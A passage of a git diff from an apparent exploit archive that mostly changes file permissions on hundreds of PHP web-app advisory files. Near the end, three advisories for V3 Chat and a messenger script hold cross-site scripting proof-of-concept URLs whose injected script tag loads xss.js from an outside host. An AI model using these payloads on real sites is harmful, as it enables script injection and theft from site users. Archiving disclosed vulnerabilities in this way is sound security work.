b/platforms/php/webapps/27628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27629.txt b/platforms/php/webapps/27629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27632.txt b/platforms/php/webapps/27632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27633.txt b/platforms/php/webapps/27633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27634.txt b/platforms/php/webapps/27634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27642.txt b/platforms/php/webapps/27642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27643.php b/platforms/php/webapps/27643.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27644.txt b/platforms/php/webapps/27644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27645.txt b/platforms/php/webapps/27645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27646.txt b/platforms/php/webapps/27646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27647.txt b/platforms/php/webapps/27647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27648.txt b/platforms/php/webapps/27648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27649.txt b/platforms/php/webapps/27649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27650.txt b/platforms/php/webapps/27650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27651.txt b/platforms/php/webapps/27651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27652.txt b/platforms/php/webapps/27652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27658.txt b/platforms/php/webapps/27658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27659.txt b/platforms/php/webapps/27659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27660.txt b/platforms/php/webapps/27660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27661.txt b/platforms/php/webapps/27661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27662.txt b/platforms/php/webapps/27662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27663.txt b/platforms/php/webapps/27663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27664.txt b/platforms/php/webapps/27664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27665.txt b/platforms/php/webapps/27665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27666.txt b/platforms/php/webapps/27666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27667.txt b/platforms/php/webapps/27667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27669.txt b/platforms/php/webapps/27669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2767.txt b/platforms/php/webapps/2767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27673.txt b/platforms/php/webapps/27673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27674.txt b/platforms/php/webapps/27674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27675.txt b/platforms/php/webapps/27675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27676.txt b/platforms/php/webapps/27676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27677.txt b/platforms/php/webapps/27677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27678.txt b/platforms/php/webapps/27678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2768.txt b/platforms/php/webapps/2768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27687.txt b/platforms/php/webapps/27687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27688.txt b/platforms/php/webapps/27688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2769.php b/platforms/php/webapps/2769.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27692.txt b/platforms/php/webapps/27692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27693.txt b/platforms/php/webapps/27693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27707.txt b/platforms/php/webapps/27707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27709.txt b/platforms/php/webapps/27709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27710.txt b/platforms/php/webapps/27710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27711.txt b/platforms/php/webapps/27711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27713.txt b/platforms/php/webapps/27713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27717.txt b/platforms/php/webapps/27717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27718.txt b/platforms/php/webapps/27718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27719.txt b/platforms/php/webapps/27719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27721.txt b/platforms/php/webapps/27721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27722.txt b/platforms/php/webapps/27722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27724.txt b/platforms/php/webapps/27724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27725.txt b/platforms/php/webapps/27725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27726.txt b/platforms/php/webapps/27726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27729.txt b/platforms/php/webapps/27729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27731.txt b/platforms/php/webapps/27731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27732.txt b/platforms/php/webapps/27732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27733.txt b/platforms/php/webapps/27733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27734.txt b/platforms/php/webapps/27734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27735.txt b/platforms/php/webapps/27735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27736.txt b/platforms/php/webapps/27736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27737.txt b/platforms/php/webapps/27737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27738.txt b/platforms/php/webapps/27738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27739.txt b/platforms/php/webapps/27739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27740.txt b/platforms/php/webapps/27740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27741.txt b/platforms/php/webapps/27741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27742.txt b/platforms/php/webapps/27742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27743.txt b/platforms/php/webapps/27743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2775.txt b/platforms/php/webapps/2775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27751.txt b/platforms/php/webapps/27751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2776.txt b/platforms/php/webapps/2776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27763.php b/platforms/php/webapps/27763.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27767.txt b/platforms/php/webapps/27767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27768.php b/platforms/php/webapps/27768.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2777.txt b/platforms/php/webapps/2777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27770.txt b/platforms/php/webapps/27770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27771.txt b/platforms/php/webapps/27771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27773.txt b/platforms/php/webapps/27773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27779.txt b/platforms/php/webapps/27779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2778.txt b/platforms/php/webapps/2778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27780.txt b/platforms/php/webapps/27780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27781.txt b/platforms/php/webapps/27781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27782.txt b/platforms/php/webapps/27782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27783.txt b/platforms/php/webapps/27783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27784.txt b/platforms/php/webapps/27784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27785.txt b/platforms/php/webapps/27785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27786.txt b/platforms/php/webapps/27786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27787.txt b/platforms/php/webapps/27787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27788.txt b/platforms/php/webapps/27788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27789.txt b/platforms/php/webapps/27789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27792.txt b/platforms/php/webapps/27792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27793.txt b/platforms/php/webapps/27793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27794.txt b/platforms/php/webapps/27794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27795.txt b/platforms/php/webapps/27795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27796.txt b/platforms/php/webapps/27796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27797.txt b/platforms/php/webapps/27797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27798.txt b/platforms/php/webapps/27798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27799.txt b/platforms/php/webapps/27799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27800.txt b/platforms/php/webapps/27800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27803.txt b/platforms/php/webapps/27803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27804.txt b/platforms/php/webapps/27804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27807.txt b/platforms/php/webapps/27807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27808.txt b/platforms/php/webapps/27808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27809.txt b/platforms/php/webapps/27809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27810.txt b/platforms/php/webapps/27810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27811.txt b/platforms/php/webapps/27811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27812.txt b/platforms/php/webapps/27812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27818.txt b/platforms/php/webapps/27818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27819.txt b/platforms/php/webapps/27819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27821.html b/platforms/php/webapps/27821.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27822.txt b/platforms/php/webapps/27822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27823.txt b/platforms/php/webapps/27823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27824.txt b/platforms/php/webapps/27824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27829.txt b/platforms/php/webapps/27829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27831.txt b/platforms/php/webapps/27831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27832.txt b/platforms/php/webapps/27832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27833.txt b/platforms/php/webapps/27833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27834.txt b/platforms/php/webapps/27834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27835.txt b/platforms/php/webapps/27835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27836.txt b/platforms/php/webapps/27836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27837.txt b/platforms/php/webapps/27837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27838.txt b/platforms/php/webapps/27838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27839.txt b/platforms/php/webapps/27839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27840.txt b/platforms/php/webapps/27840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27841.txt b/platforms/php/webapps/27841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27843.txt b/platforms/php/webapps/27843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27845.php b/platforms/php/webapps/27845.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27848.txt b/platforms/php/webapps/27848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27855.txt b/platforms/php/webapps/27855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27857.txt b/platforms/php/webapps/27857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27858.txt b/platforms/php/webapps/27858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27859.txt b/platforms/php/webapps/27859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2786.txt b/platforms/php/webapps/2786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27863.txt b/platforms/php/webapps/27863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27864.txt b/platforms/php/webapps/27864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27865.txt b/platforms/php/webapps/27865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27866.txt b/platforms/php/webapps/27866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27867.txt b/platforms/php/webapps/27867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27868.txt b/platforms/php/webapps/27868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27869.txt b/platforms/php/webapps/27869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27870.txt b/platforms/php/webapps/27870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27871.txt b/platforms/php/webapps/27871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27872.txt b/platforms/php/webapps/27872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27876.txt b/platforms/php/webapps/27876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27879.txt b/platforms/php/webapps/27879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27881.txt b/platforms/php/webapps/27881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27883.txt b/platforms/php/webapps/27883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27884.txt b/platforms/php/webapps/27884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27885.txt b/platforms/php/webapps/27885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27886.txt b/platforms/php/webapps/27886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27889.txt b/platforms/php/webapps/27889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27899.txt b/platforms/php/webapps/27899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27900.txt b/platforms/php/webapps/27900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27904.txt b/platforms/php/webapps/27904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27905.txt b/platforms/php/webapps/27905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27907.txt b/platforms/php/webapps/27907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27908.txt b/platforms/php/webapps/27908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27909.txt b/platforms/php/webapps/27909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2791.txt b/platforms/php/webapps/2791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27910.txt b/platforms/php/webapps/27910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27911.txt b/platforms/php/webapps/27911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27912.txt b/platforms/php/webapps/27912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27916.txt b/platforms/php/webapps/27916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27917.txt b/platforms/php/webapps/27917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27919.txt b/platforms/php/webapps/27919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27920.txt b/platforms/php/webapps/27920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27921.txt b/platforms/php/webapps/27921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27922.txt b/platforms/php/webapps/27922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27924.txt b/platforms/php/webapps/27924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27926.txt b/platforms/php/webapps/27926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27927.txt b/platforms/php/webapps/27927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27928.txt b/platforms/php/webapps/27928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27929.txt b/platforms/php/webapps/27929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27933.txt b/platforms/php/webapps/27933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27934.txt b/platforms/php/webapps/27934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2794.txt b/platforms/php/webapps/2794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27946.txt b/platforms/php/webapps/27946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27947.txt b/platforms/php/webapps/27947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27948.txt b/platforms/php/webapps/27948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27949.txt b/platforms/php/webapps/27949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2795.txt b/platforms/php/webapps/2795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27950.txt b/platforms/php/webapps/27950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27951.txt b/platforms/php/webapps/27951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27952.txt b/platforms/php/webapps/27952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27953.txt b/platforms/php/webapps/27953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27954.txt b/platforms/php/webapps/27954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27955.txt b/platforms/php/webapps/27955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27956.txt b/platforms/php/webapps/27956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27958.txt b/platforms/php/webapps/27958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27959.txt b/platforms/php/webapps/27959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2796.php b/platforms/php/webapps/2796.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27961.txt b/platforms/php/webapps/27961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27962.txt b/platforms/php/webapps/27962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27963.txt b/platforms/php/webapps/27963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27964.txt b/platforms/php/webapps/27964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2797.txt b/platforms/php/webapps/2797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27970.txt b/platforms/php/webapps/27970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27972.txt b/platforms/php/webapps/27972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27973.txt b/platforms/php/webapps/27973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27974.txt b/platforms/php/webapps/27974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27975.txt b/platforms/php/webapps/27975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27976.txt b/platforms/php/webapps/27976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27977.txt b/platforms/php/webapps/27977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27978.txt b/platforms/php/webapps/27978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27979.html b/platforms/php/webapps/27979.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2798.txt b/platforms/php/webapps/2798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27980.txt b/platforms/php/webapps/27980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27982.txt b/platforms/php/webapps/27982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27985.txt b/platforms/php/webapps/27985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27989.txt b/platforms/php/webapps/27989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2799.txt b/platforms/php/webapps/2799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27990.txt b/platforms/php/webapps/27990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27991.txt b/platforms/php/webapps/27991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27994.txt b/platforms/php/webapps/27994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27995.txt b/platforms/php/webapps/27995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27996.txt b/platforms/php/webapps/27996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27997.txt b/platforms/php/webapps/27997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27998.txt b/platforms/php/webapps/27998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27999.txt b/platforms/php/webapps/27999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28000.txt b/platforms/php/webapps/28000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28006.txt b/platforms/php/webapps/28006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28008.txt b/platforms/php/webapps/28008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28009.txt b/platforms/php/webapps/28009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28010.txt b/platforms/php/webapps/28010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28011.txt b/platforms/php/webapps/28011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28012.txt b/platforms/php/webapps/28012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28013.txt b/platforms/php/webapps/28013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28014.txt b/platforms/php/webapps/28014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28015.txt b/platforms/php/webapps/28015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28016.txt b/platforms/php/webapps/28016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28017.txt b/platforms/php/webapps/28017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28018.txt b/platforms/php/webapps/28018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28019.txt b/platforms/php/webapps/28019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28020.txt b/platforms/php/webapps/28020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28021.txt b/platforms/php/webapps/28021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28022.txt b/platforms/php/webapps/28022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28023.txt b/platforms/php/webapps/28023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28024.txt b/platforms/php/webapps/28024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28025.txt b/platforms/php/webapps/28025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28027.txt b/platforms/php/webapps/28027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28028.txt b/platforms/php/webapps/28028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28031.txt b/platforms/php/webapps/28031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28032.txt b/platforms/php/webapps/28032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28033.txt b/platforms/php/webapps/28033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28034.txt b/platforms/php/webapps/28034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28035.txt b/platforms/php/webapps/28035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28036.txt b/platforms/php/webapps/28036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28037.txt b/platforms/php/webapps/28037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28038.txt b/platforms/php/webapps/28038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28039.txt b/platforms/php/webapps/28039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28040.txt b/platforms/php/webapps/28040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28041.txt b/platforms/php/webapps/28041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28042.txt b/platforms/php/webapps/28042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28043.txt b/platforms/php/webapps/28043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28045.txt b/platforms/php/webapps/28045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28046.txt b/platforms/php/webapps/28046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28047.txt b/platforms/php/webapps/28047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28048.txt b/platforms/php/webapps/28048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28054.txt b/platforms/php/webapps/28054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28057.txt b/platforms/php/webapps/28057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28058.txt b/platforms/php/webapps/28058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28059.txt b/platforms/php/webapps/28059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28060.txt b/platforms/php/webapps/28060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28063.txt b/platforms/php/webapps/28063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28064.txt b/platforms/php/webapps/28064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28066.txt b/platforms/php/webapps/28066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28067.txt b/platforms/php/webapps/28067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28068.txt b/platforms/php/webapps/28068.txt old mode 100755 new mode 100644 index 3e852db7d..1c33b6e6b --- a/platforms/php/webapps/28068.txt +++ b/platforms/php/webapps/28068.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file +http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file diff --git a/platforms/php/webapps/28069.txt b/platforms/php/webapps/28069.txt old mode 100755 new mode 100644 index fc3097094..c30d1f283 --- a/platforms/php/webapps/28069.txt +++ b/platforms/php/webapps/28069.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file +http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file diff --git a/platforms/php/webapps/28070.txt b/platforms/php/webapps/28070.txt old mode 100755 new mode 100644 index 668065d86..2ce49f18c --- a/platforms/php/webapps/28070.txt +++ b/platforms/php/webapps/28070.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></ SCRIPT>"> \ No newline at end of file +http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></ SCRIPT>"> \ No newline at end of file diff --git a/platforms/php/webapps/28071.txt b/platforms/php/webapps/28071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28072.txt 